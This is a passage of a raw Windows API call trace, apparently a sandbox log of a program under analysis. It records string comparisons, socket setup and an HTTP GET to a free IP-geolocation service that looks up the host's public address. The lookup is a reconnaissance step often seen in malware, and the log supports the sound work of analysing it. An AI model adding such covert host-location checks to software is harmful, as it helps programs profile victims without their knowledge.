dwFlags=0x0, lpMultiByteStr=0x2435c68, cbMultiByte=2, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 2 [0102.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x2435c68, cbMultiByte=2, lpWideCharStr=0x2483eac, cchWideChar=2 | out: lpWideCharStr="EU") returned 2 [0102.960] GetCurrentThreadId () returned 0x1358 [0102.960] GetCurrentThreadId () returned 0x1358 [0102.960] GetCurrentThreadId () returned 0x1358 [0102.960] GetCurrentThreadId () returned 0x1358 [0102.960] GetCurrentThreadId () returned 0x1358 [0102.960] GetCurrentThreadId () returned 0x1358 [0102.960] GetCurrentThreadId () returned 0x1358 [0102.960] GetCurrentThreadId () returned 0x1358 [0102.960] GetCurrentThreadId () returned 0x1358 [0102.960] GetCurrentThreadId () returned 0x1358 [0102.960] GetCurrentThreadId () returned 0x1358 [0102.960] GetCurrentThreadId () returned 0x1358 [0102.960] GetCurrentThreadId () returned 0x1358 [0102.960] GetCurrentThreadId () returned 0x1358 [0102.960] GetCurrentThreadId () returned 0x1358 [0102.960] GetCurrentThreadId () returned 0x1358 [0102.960] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] ResetEvent (hEvent=0x3f0) returned 1 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] ResetEvent (hEvent=0x3f0) returned 1 [0102.961] GetLocalTime (in: lpSystemTime=0x19fc78 | out: lpSystemTime=0x19fc78*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x0, wMilliseconds=0x189)) [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] SetEvent (hEvent=0x3f4) returned 1 [0102.961] SetEvent (hEvent=0x3f0) returned 1 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] ResetEvent (hEvent=0x3f0) returned 1 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.961] GetCurrentThreadId () returned 0x1358 [0102.962] GetCurrentThreadId () returned 0x1358 [0102.962] ResetEvent (hEvent=0x3f0) returned 1 [0102.962] GetCurrentThreadId () returned 0x1358 [0102.962] GetCurrentThreadId () returned 0x1358 [0102.962] GetCurrentThreadId () returned 0x1358 [0102.962] GetCurrentThreadId () returned 0x1358 [0102.962] GetCurrentThreadId () returned 0x1358 [0102.962] GetCurrentThreadId () returned 0x1358 [0102.962] GetCurrentThreadId () returned 0x1358 [0102.962] GetCurrentThreadId () returned 0x1358 [0102.962] GetCurrentThreadId () returned 0x1358 [0102.962] GetCurrentThreadId () returned 0x1358 [0102.962] SetEvent (hEvent=0x3f4) returned 1 [0102.962] SetEvent (hEvent=0x3f0) returned 1 [0102.962] GetCurrentThreadId () returned 0x1358 [0102.962] ResetEvent (hEvent=0x3f0) returned 1 [0102.962] GetCurrentThreadId () returned 0x1358 [0102.962] GetCurrentThreadId () returned 0x1358 [0102.962] GetCurrentThreadId () returned 0x1358 [0102.962] GetCurrentThreadId () returned 0x1358 [0102.962] ResetEvent (hEvent=0x3f0) returned 1 [0102.962] CloseHandle (hObject=0x3f0) returned 1 [0102.962] CloseHandle (hObject=0x3f4) returned 1 [0102.962] GetCurrentThreadId () returned 0x1358 [0102.962] GetCurrentThreadId () returned 0x1358 [0102.962] GetCurrentThreadId () returned 0x1358 [0102.962] GetCurrentThreadId () returned 0x1358 [0102.962] GetCurrentThreadId () returned 0x1358 [0102.962] GetCurrentThreadId () returned 0x1358 [0102.962] shutdown (s=0x3d0, how=1) returned 0 [0102.963] closesocket (s=0x3d0) returned 0 [0102.963] GetCurrentThreadId () returned 0x1358 [0102.963] GetCurrentThreadId () returned 0x1358 [0102.963] GetCurrentThreadId () returned 0x1358 [0102.963] GetCurrentThreadId () returned 0x1358 [0102.963] GetCurrentThreadId () returned 0x1358 [0102.963] GetCurrentThreadId () returned 0x1358 [0102.963] GetCurrentThreadId () returned 0x1358 [0102.963] GetCurrentThreadId () returned 0x1358 [0102.963] GetCurrentThreadId () returned 0x1358 [0102.963] GetCurrentThreadId () returned 0x1358 [0102.963] GetCurrentThreadId () returned 0x1358 [0102.963] GetCurrentThreadId () returned 0x1358 [0102.963] GetCurrentThreadId () returned 0x1358 [0102.963] GetCurrentThreadId () returned 0x1358 [0102.963] GetCurrentThreadId () returned 0x1358 [0102.964] GetCurrentThreadId () returned 0x1358 [0102.964] GetCurrentThreadId () returned 0x1358 [0102.964] GetCurrentThreadId () returned 0x1358 [0102.964] GetCurrentThreadId () returned 0x1358 [0102.964] GetCurrentThreadId () returned 0x1358 [0102.964] GetCurrentThreadId () returned 0x1358 [0102.964] GetCurrentThreadId () returned 0x1358 [0102.964] GetCurrentThreadId () returned 0x1358 [0102.964] GetCurrentThreadId () returned 0x1358 [0102.964] GetCurrentThreadId () returned 0x1358 [0102.964] GetCurrentThreadId () returned 0x1358 [0102.964] GetCurrentThreadId () returned 0x1358 [0102.964] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0102.964] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0102.964] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0102.964] GetCurrentThreadId () returned 0x1358 [0102.964] GetCurrentThreadId () returned 0x1358 [0102.964] GetCurrentThreadId () returned 0x1358 [0102.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0102.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0102.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".", cchCount1=1, lpString2="@", cchCount2=1) returned 1 [0102.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="@", cchCount2=1) returned 3 [0102.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="N", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2="/", cchCount2=1) returned 3 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/v2/free/95.222.165.118/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="TRACE", cchCount2=5) returned 1 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PUT", cchCount2=3) returned 1 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="DELETE", cchCount2=6) returned 3 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PATCH", cchCount2=5) returned 1 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TRACE", cchCount2=5) returned 1 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PUT", cchCount2=3) returned 1 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="DELETE", cchCount2=6) returned 1 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PATCH", cchCount2=5) returned 1 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="api.db-ip.com", cchCount2=13) returned 1 [0102.965] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="HTTPS", cchCount2=5) returned 1 [0102.966] socket (af=2, type=1, protocol=0) returned 0x3d0 [0102.966] getsockopt (in: s=0x3d0, level=65535, optname=4104, optval=0x19fb10, optlen=0x19fb0c | out: optval="\x01", optlen=0x19fb0c) returned 0 [0102.966] getsockopt (in: s=0x3d0, level=6, optname=1, optval=0x19fb10, optlen=0x19fb0c | out: optval="", optlen=0x19fb0c) returned 0 [0102.966] setsockopt (s=0x3d0, level=65535, optname=4, optval="", optlen=4) returned 0 [0102.966] htons (hostshort=0x0) returned 0x0 [0102.966] bind (s=0x3d0, addr=0x19fa68*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0102.966] getsockname (in: s=0x3d0, name=0x19fa5c, namelen=0x19fadc | out: name=0x19fa5c*(sa_family=2, sin_port=0xc21c, sin_addr="0.0.0.0"), namelen=0x19fadc) returned 0 [0102.966] htons (hostshort=0x1cc2) returned 0xc21c [0102.966] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="api.db-ip.com", cchCount1=13, lpString2="LOCALHOST", cchCount2=9) returned 1 [0102.966] GetAddrInfoW (in: pNodeName="api.db-ip.com", pServiceName=0x0, pHints=0x19fb10*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fb30 | out: ppResult=0x19fb30*=0xa1e348*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c0f8*(sa_family=2, sin_port=0x0, sin_addr="104.26.5.15"), ai_next=0xa1ebe8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c1d8*(sa_family=2, sin_port=0x0, sin_addr="104.26.4.15"), ai_next=0x0))) returned 0 [0102.968] FreeAddrInfoW (pAddrInfo=0xa1e348*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c0f8*(sa_family=2, sin_port=0x0, sin_addr="104.26.5.15"), ai_next=0xa1ebe8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c1d8*(sa_family=2, sin_port=0x0, sin_addr="104.26.4.15"), ai_next=0x0))) [0102.968] htons (hostshort=0x50) returned 0x5000 [0102.968] connect (s=0x3d0, name=0x19fac0*(sa_family=2, sin_port=0x50, sin_addr="104.26.5.15"), namelen=16) returned 0 [0102.989] getsockname (in: s=0x3d0, name=0x19faa8, namelen=0x19fb28 | out: name=0x19faa8*(sa_family=2, sin_port=0xc21c, sin_addr="192.168.0.147"), namelen=0x19fb28) returned 0 [0102.989] htons (hostshort=0x1cc2) returned 0xc21c [0102.989] getpeername (in: s=0x3d0, name=0x19faa8, namelen=0x19fb28 | out: name=0x19faa8*(sa_family=2, sin_port=0x50, sin_addr="104.26.5.15"), namelen=0x19fb28) returned 0 [0102.989] htons (hostshort=0x5000) returned 0x50 [0102.989] GetCurrentThreadId () returned 0x1358 [0102.989] GetCurrentThreadId () returned 0x1358 [0102.989] GetCurrentThreadId () returned 0x1358 [0102.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Host", cchCount1=4, lpString2="Accept", cchCount2=6) returned 3 [0102.989] GetCurrentThreadId () returned 0x1358 [0102.989] GetCurrentThreadId () returned 0x1358 [0102.989] GetCurrentThreadId () returned 0x1358 [0102.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Host", cchCount1=4, lpString2="User-Agent", cchCount2=10) returned 1 [0102.989] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept", cchCount1=6, lpString2="User-Agent", cchCount2=10) returned 1 [0102.989] GetCurrentThreadId () returned 0x1358 [0102.989] GetCurrentThreadId () returned 0x1358 [0102.989] GetCurrentThreadId () returned 0x1358 [0102.990] send (s=0x3d0, buf=0x24049b8*, len=200, flags=0) returned 200 [0102.990] GetTickCount64 () returned 0x115b0af [0102.990] select (in: nfds=0, readfds=0x19fa24, writefds=0x0, exceptfds=0x0, timeout=0x0 | out: readfds=0x19fa24, writefds=0x0, exceptfds=0x0) returned 1 [0103.030] recv (in: s=0x3d0, buf=0x242e938, len=32768, flags=0 | out: buf=0x242e938*) returned 507 [0103.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.0", cchCount1=3, lpString2="1.1", cchCount2=3) returned 1 [0103.030] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.1", cchCount1=3, lpString2="1.1", cchCount2=3) returned 2 [0103.030] GetTickCount64 () returned 0x115b0de [0103.030] GetTickCount64 () returned 0x115b0de [0103.030] GetTickCount64 () returned 0x115b0de [0103.030] GetTickCount64 () returned 0x115b0de [0103.030] GetTickCount64 () returned 0x115b0de [0103.030] GetTickCount64 () returned 0x115b0de [0103.030] GetTickCount64 () returned 0x115b0de [0103.030] GetTickCount64 () returned 0x115b0de [0103.030] GetTickCount64 () returned 0x115b0de [0103.030] GetTickCount64 () returned 0x115b0de [0103.030] GetTickCount64 () returned 0x115b0de [0103.031] GetTickCount64 () returned 0x115b0de [0103.031] GetTickCount64 () returned 0x115b0de [0103.031] GetTickCount64 () returned 0x115b0de [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Cache-control", cchCount2=13) returned 3 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Cache-control", cchCount2=13) returned 3 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Cache-control", cchCount2=13) returned 3 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Cache-control", cchCount2=13) returned 3 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Cache-control", cchCount2=13) returned 3 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Cache-control", cchCount2=13) returned 3 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Cache-control", cchCount2=13) returned 1 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Cache-control", cchCount2=13) returned 2 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Connection", cchCount2=10) returned 3 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Connection", cchCount2=10) returned 3 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Connection", cchCount2=10) returned 3 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Connection", cchCount2=10) returned 2 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Version", cchCount2=15) returned 3 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Version", cchCount2=15) returned 1 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Version", cchCount2=15) returned 3 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Version", cchCount2=15) returned 1 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Version", cchCount2=15) returned 3 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Version", cchCount2=15) returned 3 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Version", cchCount2=15) returned 1 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Version", cchCount2=15) returned 1 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Version", cchCount2=15) returned 3 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Version", cchCount2=15) returned 1 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Version", cchCount2=15) returned 1 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Version", cchCount2=15) returned 3 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Version", cchCount2=15) returned 1 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Disposition", cchCount2=19) returned 3 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Disposition", cchCount2=19) returned 1 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Encoding", cchCount2=16) returned 3 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Encoding", cchCount2=16) returned 1 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Language", cchCount2=16) returned 3 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Language", cchCount2=16) returned 3 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Language", cchCount2=16) returned 3 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Language", cchCount2=16) returned 1 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Language", cchCount2=16) returned 3 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Language", cchCount2=16) returned 3 [0103.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Language", cchCount2=16) returned 1 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Language", cchCount2=16) returned 1 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Language", cchCount2=16) returned 3 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Language", cchCount2=16) returned 1 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Language", cchCount2=16) returned 1 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Language", cchCount2=16) returned 3 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Language", cchCount2=16) returned 1 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Type", cchCount2=12) returned 3 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Type", cchCount2=12) returned 2 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UTF-8", cchCount1=1, lpString2="\"", cchCount2=1) returned 3 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="charset=UTF-8", cchCount1=7, lpString2="charset", cchCount2=7) returned 2 [0103.033] GetCurrentThreadId () returned 0x1358 [0103.033] GetCurrentThreadId () returned 0x1358 [0103.033] GetCurrentThreadId () returned 0x1358 [0103.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Length", cchCount2=14) returned 3 [0103.033] 